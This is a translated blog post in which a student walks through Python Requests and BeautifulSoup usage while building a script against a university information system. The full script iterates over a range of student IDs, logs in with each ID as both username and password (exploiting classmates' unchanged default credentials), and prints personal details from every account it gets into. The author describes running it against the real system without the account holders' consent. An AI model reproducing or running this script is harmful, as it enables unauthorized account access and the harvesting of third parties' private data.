Python Programming Practice: Simulated Login and Information Scraping · Uknow

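Preface

I have recently been watching the video course 《简单学python安全》 on 安全牛 and wanted to write something small of my own. An information system I use for my studies happened to fit: my classmates' accounts all still have the default username and password, and there is no CAPTCHA, so it is a relatively easy target. That is how this little script got started. I ran into quite a few problems along the way, asked a senior classmate for advice, and finished it with his help and guidance. This post looks back on the process.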

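Main Text

Packet Capture Analysis

When I first captured and analyzed the traffic on my own, I ran into problems. My analysis of the login flow was not rigorous enough, so the simulated login kept failing. The senior classmate then helped me go through it: the login actually takes two POST requests. Up to that point I had been using urllib to simulate the login; on his suggestion I switched to Requests, a higher-level library than urllib.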

The first POST request

POST /renzheng.jsp HTTP/1.1
Host: xxxx.xxxx.edu.cn
Content-Length: 142
Cache-Control: max-age=0
Origin: http://xxxx.xxxx.edu.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://xxxx.xxxx.edu.cn
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: UM_distinctid=15b7be26085454-0504ed9f0e367d-3c365402-100200-15b7be26086832; JSESSIONID=213C06E58934DCED50E4E479858CB055
Connection: close

displayName=&displayPasswd=&select=2&submit.x=36&submit.y=14&operType=911&random_form=-1048366953725273893&userName=xxxxx&passwd=xxxxx

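The first request shows that the POST data consists of nine parameters:
displayName and displayPasswd are empty by default.
select, submit.x and submit.y: select is the user type (select=1 for teachers, select=2 for students), and submit.x and submit.y are the coordinates of the mouse click.
operType and random_form: operType defaults to 911, and random_form is a random string of digits.
userName and passwd are the account name and password, sent in plaintext.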
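As a quick check on the field list above, here is a minimal sketch (Python 3, standard library only, not part of the original script) that splits the captured body into its fields. The body string is copied from the capture; the variable names are my own.

```python
from urllib.parse import parse_qsl

# Body of the first captured POST, copied from the capture above.
captured_body = (
    "displayName=&displayPasswd=&select=2&submit.x=36&submit.y=14"
    "&operType=911&random_form=-1048366953725273893"
    "&userName=xxxxx&passwd=xxxxx"
)

# keep_blank_values=True keeps the empty displayName / displayPasswd fields,
# which parse_qsl would otherwise drop.
fields = dict(parse_qsl(captured_body, keep_blank_values=True))

for name, value in fields.items():
    print(name, "=", repr(value))
print("field count:", len(fields))
```

Listing the fields this way makes it easier to compare the captured form against the dictionary that the script later posts.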

The second POST request

POST /servlet/adminservlet HTTP/1.1
Host: xxxx.xxxx.edu.cn
Content-Length: 65
Cache-Control: max-age=0
Origin: http://xxxx.xxxx.edu.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://xxxx.xxxx.edu.cn/renzheng.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: UM_distinctid=15b7be26085454-0504ed9f0e367d-3c365402-100200-15b7be26086832; JSESSIONID=213C06E58934DCED50E4E479858CB055
Connection: close

isValidate=false&userName=xxxxx&passwd=xxxxx&operType=911

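The Referer shows that this request is sent from the page returned by the first request.
userName and passwd are the account name and password, sent in plaintext.
isValidate defaults to false.
operType defaults to 911.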

The GET request for the page to scrape

GET /student/studentInfo.jsp?userName=xxxx&passwd=xxxxx HTTP/1.1
Host: xxxx.xxxx.edu.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://xxxx.xxxx.edu.cn/servlet/adminservlet
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: UM_distinctid=15b7be26085454-0504ed9f0e367d-3c365402-100200-15b7be26086832; JSESSIONID=213C06E58934DCED50E4E479858CB055
Connection: close

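The Referer shows that this request is sent from the page returned by the second request.
userName and passwd are the account name and password, sent in plaintext in the URL query string.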
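Since the credentials travel in the query string, the URL has to be assembled for every account. Below is a minimal sketch (Python 3, standard library only) of one way to do that with urlencode rather than string concatenation, so that special characters are escaped. The helper name build_info_url and the sample values are my own assumptions; the host is the redacted placeholder from the capture.

```python
from urllib.parse import urlencode

# Redacted placeholder host, as it appears in the capture above.
INFO_URL = "http://xxxx.xxxx.edu.cn/student/studentInfo.jsp"


def build_info_url(username, password):
    """Return the studentInfo.jsp URL with both values percent-encoded."""
    query = urlencode({"userName": username, "passwd": password})
    return INFO_URL + "?" + query


# Hypothetical sample values, only for illustration.
print(build_info_url("20170001", "20170001"))
print(build_info_url("20170001", "p&ss word"))
```

With plain concatenation, a password containing & or a space would split or corrupt the query string; urlencode avoids that.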

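Constructing the simulated requests

While writing the Python code I tried an object-oriented approach and defined the relevant variables as private class attributes. The simulated login itself uses the Requests module.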

__header = {
			'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
			'Content-Type':'application/x-www-form-urlencoded',
			'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
			'Referer': 'http://xxxx.xxxx.edu.cn/',
			'Accept-Encoding': 'gzip, deflate',
			'Accept-Language': 'zh-CN,zh;q=0.8'
	}
__data1 = {
			'displayName' : '',
	  		'displayPasswd' : '',
	  		'select': '2',
	  		'submit.x': '43',
	  		'submit.y' : '12',
	  		'operType' : '911',
	  		'random_form' : '5129319019753764987',
	 		'userName' : '',
	 		'passwd' : ''
	}
__data2 = {
			'isValidate':'false',
			'userName':'',
			'passwd':'',
			'operType':'911',
	}
__posturl1 = 'http://xxxx.xxxx.edu.cn/renzheng.jsp'
__posturl2 = 'http://xxxx.xxxx.edu.cn/servlet/adminservlet'

__geturl = 'http://xxxx.xxxx.edu.cn/student/studentInfo.jsp?userName=&passwd='

The Requests library

Requests is an HTTP library for Python that provides many HTTP-related functions. We can list what the library exposes with dir(requests):

>>> import requests
>>> dir(requests)
['ConnectionError', 'HTTPError', 'NullHandler', 'PreparedRequest', 'Request', 'RequestException', 'Response', 'Session', 'Timeout', 'TooManyRedirects', 'URLRequired', '__author__', '__build__', '__builtins__', '__copyright__', '__doc__', '__file__', '__license__', '__name__', '__package__', '__path__', '__title__', '__version__', 'adapters', 'api', 'auth', 'certs', 'codes', 'compat', 'cookies', 'delete', 'exceptions', 'get', 'head', 'hooks', 'logging', 'models', 'options', 'patch', 'post', 'put', 'request', 'session', 'sessions', 'status_codes', 'structures', 'utils']

This project mainly uses Session, get and post, plus the content attribute of the response object.

Session objects

A Session object lets you persist certain parameters across requests. It also persists cookies across all requests made from the same Session instance.

>>> s = requests.Session()
>>> r = s.get("https://uknowsec.cn/")
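To make the cookie behaviour concrete, here is a small sketch (Python 3, needs the requests package) that never touches the network. It stores a cookie on the session by hand and then asks the session to prepare a request, which shows the Cookie header the session would send. The cookie value and the example.org URL are made up for illustration.

```python
import requests

session = requests.Session()

# Pretend the server set this cookie during login (the value is made up).
session.cookies.set("JSESSIONID", "0123456789ABCDEF")

# prepare_request() builds the request the session would send, without sending it.
request = requests.Request("GET", "http://example.org/student/info")
prepared = session.prepare_request(request)

print(prepared.headers.get("Cookie"))
```

This is why the two POST requests and the final GET all have to go through the same Session: the JSESSIONID obtained at login is attached automatically to every later request.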

GET requests

Request the given URL with the GET method:

>>> r = requests.get("https://uknowsec.cn/", proxies=proxies, timeout=0.001, params=payload)

params passes the query parameters for a GET request:

r = requests.get("http://httpbin.org/get", params=payload)
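The payload variable is never defined in the snippets above, so here is a hedged sketch (Python 3, needs the requests package) with a hypothetical payload dictionary. It prepares the request without sending it, which is enough to see how params ends up in the URL.

```python
import requests

# Hypothetical query parameters, only for illustration.
payload = {"key1": "value1", "key2": "value2"}

# Build the request without sending it, then inspect the final URL.
prepared = requests.Request("GET", "http://httpbin.org/get", params=payload).prepare()

print(prepared.url)
```

Requests encodes the dictionary into the query string itself, so there is no need to glue the URL together by hand.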

proxies: if you need to use a proxy, you can configure an individual request by passing the proxies argument to any request method:

import requests

proxies = {
  "http": "http://10.10.1.10:3128",
  "https": "http://10.10.1.10:1080",
}

requests.get("http://example.org", proxies=proxies)

timeout: Requests stops waiting for a response after the number of seconds given by the timeout argument:

>>> requests.get('http://github.com', timeout=0.001)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
requests.exceptions.Timeout: HTTPConnectionPool(host='github.com', port=80): Request timed out. (timeout=0.001)

POST requests

Request the given URL with the POST method:

requests.post("http://example.org", headers=header, data=data)

headers carries the request header fields to send.

Request headers

Here we only need to include the common fields:

'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
'Content-Type':'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Referer': 'http://xxxx.xxxx.edu.cn/',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.8'

data is the form data submitted in the POST body:

'displayName' : '',
'displayPasswd' : '',
'select': '2',
'submit.x': '43',
'submit.y' : '12',
'operType' : '911',
'random_form' : '5129319019753764987',
'userName' : '',
'passwd' : ''

Requests code

def Firstlogin(self):
	Firstrequest = self.__session.post(self.__posturl1, data=self.__data1, headers=self.__header)

def Secondlogin(self):
	Secondrequest = self.__session.post(self.__posturl2, data=self.__data2, headers=self.__header)

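The BeautifulSoup library

BeautifulSoup is a Python library for pulling data out of HTML and XML files. It works with your preferred parser to provide idiomatic ways of navigating, searching and modifying the document. As with Requests, dir() lists what the module provides (the listing below comes from the older BeautifulSoup 3 module, while the full script at the end imports from bs4):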

>>> import BeautifulSoup
>>> dir(BeautifulSoup)
['BeautifulSOAP', 'BeautifulSoup', 'BeautifulStoneSoup', 'CData', 'Comment', 'DEFAULT_OUTPUT_ENCODING', 'Declaration', 'ICantBelieveItsBeautifulSoup', 'MinimalSoup', 'NavigableString', 'PageElement', 'ProcessingInstruction', 'ResultSet', 'RobustHTMLParser', 'RobustInsanelyWackAssHTMLParser', 'RobustWackAssHTMLParser', 'RobustXMLParser', 'SGMLParseError', 'SGMLParser', 'SimplifyingSOAPParser', 'SoupStrainer', 'StopParsing', 'Tag', 'UnicodeDammit', '__author__', '__builtins__', '__copyright__', '__doc__', '__file__', '__license__', '__name__', '__package__', '__version__', '_match_css_class', 'buildTagMap', 'chardet', 'codecs', 'generators', 'markupbase', 'name2codepoint', 're', 'sgmllib', 'types']

Parsing as XML

By default, Beautiful Soup parses a document as HTML. To parse an XML document, pass "xml" as the second argument to the BeautifulSoup constructor:

soup = BeautifulSoup(markup, "xml")

find_all()

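The find_all() method returns every tag in the document that matches the given criteria. The result is always a list, even when there is only one match.
In my case the information I needed sits inside a table tag. Because the result is a list, I used an index to locate the relevant tr rows and then a for loop to print the contents of each td.
The code that loops over a table and prints it is shown below (findAll is the older spelling of find_all):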

tables = soup.findAll('table')  
tab = tables[0]  
for tr in tab.findAll('tr'):  
    for td in tr.findAll('td'):  
        print td.getText(),
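The real page is not shown in this post, so here is a self-contained sketch of the same idea (Python 3, needs the bs4 package) run against a made-up table. It uses the bs4 spellings find_all and get_text and the built-in "html.parser", so lxml is not required; the HTML content is purely an assumption.

```python
from bs4 import BeautifulSoup

# Made-up HTML standing in for the real page, which is not shown in this post.
html = """
<table>
  <tr><td>Name</td><td>Alice</td></tr>
  <tr><td>Class</td><td>CS-1</td></tr>
</table>
"""

soup = BeautifulSoup(html, "html.parser")
table = soup.find_all("table")[0]  # find_all returns a list; take the first table

rows = []
for tr in table.find_all("tr"):
    # Collect the stripped text of every cell in this row.
    rows.append([td.get_text(strip=True) for td in tr.find_all("td")])

for row in rows:
    print(" ".join(row))
```

Collecting the cells into a list of rows first, instead of printing straight away, makes it easy to save or filter the data later.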

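The comma in Python

Printing a table in the find_all() loop above uses a trailing comma, which led me to learn that the comma plays several special roles in Python.

In argument passing, the comma separates the arguments,
for example def abc(a,b) or abc(1,2).
In type conversion, the comma is what makes a tuple: when the tuple b has only one element, the trailing comma is required for b to be a tuple at all.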
>>> a=11
>>> b=(a)
>>> b
11
>>> b=(a,)
>>> b
(11,)
>>> b=(a,22)
>>> b
(11, 22)
>>> b=(a,22,)
>>> b
(11, 22)
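In the print statement (Python 2) the comma has a handy use: print normally appends a newline, but with a trailing comma the newline is replaced by a space.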


for i in range(0,5):
    print i

0
1
2
3
4

for i in range(0,5):
    print i,

0 1 2 3 4
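The trailing comma only works with the Python 2 print statement. In Python 3, where print is a function, the same effect comes from the end argument. Here is a minimal sketch; the helper name print_row is my own.

```python
def print_row(values):
    """Print all values on one line, separated by spaces (Python 3)."""
    for value in values:
        print(value, end=" ")  # a space instead of the default newline
    print()                    # finish the line


print_row(range(0, 5))

# A shorter alternative: unpack the values and let print add the spaces.
print(*range(0, 5))
```

Unlike the Python 2 form, the loop version leaves one extra space at the end of the line; the unpacking version does not.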

BeautifulSoup code

Thirdrequest = self.__session.get(geturl)
page = Thirdrequest.content
soup = BeautifulSoup(page,"lxml")
tr = soup.findAll('tr')
for i in range(5,14):
	for td in tr[i].findAll('td'):
		print  td.getText(),

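Exception handling

Exceptions can be caught with the try/except statement.
try/except detects errors raised in the try block so that the except clause can catch the exception and handle it.
If you do not want your program to terminate when an exception occurs, catch it with try.

try:
    <statements>        # run some code
except <name>:
    <statements>        # runs if the exception <name> is raised in the try block
except <name>, <data>:
    <statements>        # runs if <name> is raised; <data> receives the extra data (Python 2 syntax, Python 3 uses "as")
else:
    <statements>        # runs if no exception occurred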

Using except without any exception type

try:
    normal operations
    ......................
except:
    an exception occurred, run this block
    ......................
else:
    no exception occurred, run this block
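Using except with multiple exception types

try:
    normal operations
    ......................
except (Exception1[, Exception2[, ...ExceptionN]]):
    one of the exceptions listed above occurred, run this block
    ......................
else:
    no exception occurred, run this block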

The try-finally statement

try:
    <statements>
finally:
    <statements>    # always runs when leaving the try block
raise
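The templates above are abstract, so here is a small runnable sketch (Python 3) that combines except, else and finally in one function. It uses IndexError, the same exception the full script skips when a page has fewer rows than expected. The function name and sample data are my own.

```python
def cell_text(rows, index):
    """Return rows[index], or None when that row does not exist."""
    try:
        value = rows[index]
    except IndexError:
        # Raised when the list is shorter than expected.
        print("row", index, "is missing")
        return None
    else:
        # Runs only when the try block raised no exception.
        return value
    finally:
        # Runs on every exit from the try statement, exception or not.
        print("checked row", index)


print(cell_text(["a", "b"], 1))
print(cell_text(["a"], 5))
```

Catching only IndexError, rather than using a bare except, means unrelated errors such as network failures still surface instead of being silently skipped.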

Result screenshot

Full code

#!/usr/bin/python
# -*- coding: utf-8 -*-

import requests
import time
import os
from bs4 import BeautifulSoup



class UCrawler(object):
	"""docstring for UCrawler"""
	__header = {
				'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
				'Content-Type':'application/x-www-form-urlencoded',
				'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
				'Referer': 'http://xxxx.xxxx.edu.cn/',
				'Accept-Encoding': 'gzip, deflate',
				'Accept-Language': 'zh-CN,zh;q=0.8'
		}
	__data1 = {
				'displayName' : '',
		  		'displayPasswd' : '',
		  		'select': '2',
		  		'submit.x': '43',
		  		'submit.y' : '12',
		  		'operType' : '911',
		  		'random_form' : '5129319019753764987',
		 		'userName' : 'xxxxxxx',
		 		'passwd' : 'xxxxxxx'
		}
	__data2 = {
				'isValidate':'false',
				'userName':'xxxxxxx',
				'passwd':'xxxxxxx',
				'operType':'911',
		}
	__posturl1 = 'http://xxxx.xxxx.edu.cn/renzheng.jsp'
	__posturl2 = 'http://xxxx.xxxx.edu.cn/servlet/adminservlet'


	__session=requests.Session()

	def Firstlogin(self):
		Firstrequest = self.__session.post(self.__posturl1, data=self.__data1, headers=self.__header)

	def Secondlogin(self):
		Secondrequest = self.__session.post(self.__posturl2, data=self.__data2, headers=self.__header)


	def PrintAndGet(self):
		a = range(xxxxxxxx,xxxxxxx)
		for tmp in a:
			try:
				username = str(tmp)
				password = str(tmp)
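				self.__data1['userName']=username
				self.__data1['passwd']=password
				self.__data2['userName']=username
				self.__data2['passwd']=password
				# Log in with the two POST requests, reusing the same session
				Firstrequest = self.__session.post(self.__posturl1, data=self.__data1, headers=self.__header)
				Secondrequest = self.__session.post(self.__posturl2, data=self.__data2, headers=self.__header)
				geturl = 'http://xxxx.xxxx.edu.cn/student/studentInfo.jsp?userName='+username+'&passwd='+password
				# Fetch the student info page and print the cells of rows 5 to 13
				Thirdrequest = self.__session.get(geturl)
				page = Thirdrequest.content
				soup = BeautifulSoup(page,"lxml")
				tr = soup.findAll('tr')
				for i in range(5,14):
					for td in tr[i].findAll('td'):
						print  td.getText(),
				print '\n'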
			except IndexError:
				continue

if __name__ == '__main__':

	U = UCrawler()
	U.Firstlogin()
	U.Secondlogin()
	U.PrintAndGet()

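Summary

Writing this took quite a while, since my skills are still pretty basic: I was looking things up, writing code and reading up on the relevant topics all at once. I also asked the senior classmate a lot of really dumb questions, which was embarrassing, but he patiently helped me solve each problem. I learned a lot of Python along the way, including how to use the relevant libraries, common pitfalls and exception handling. Finally, the script may have hit the system many times during all this, and I apologize for that. There was no malicious intent; it was only a test.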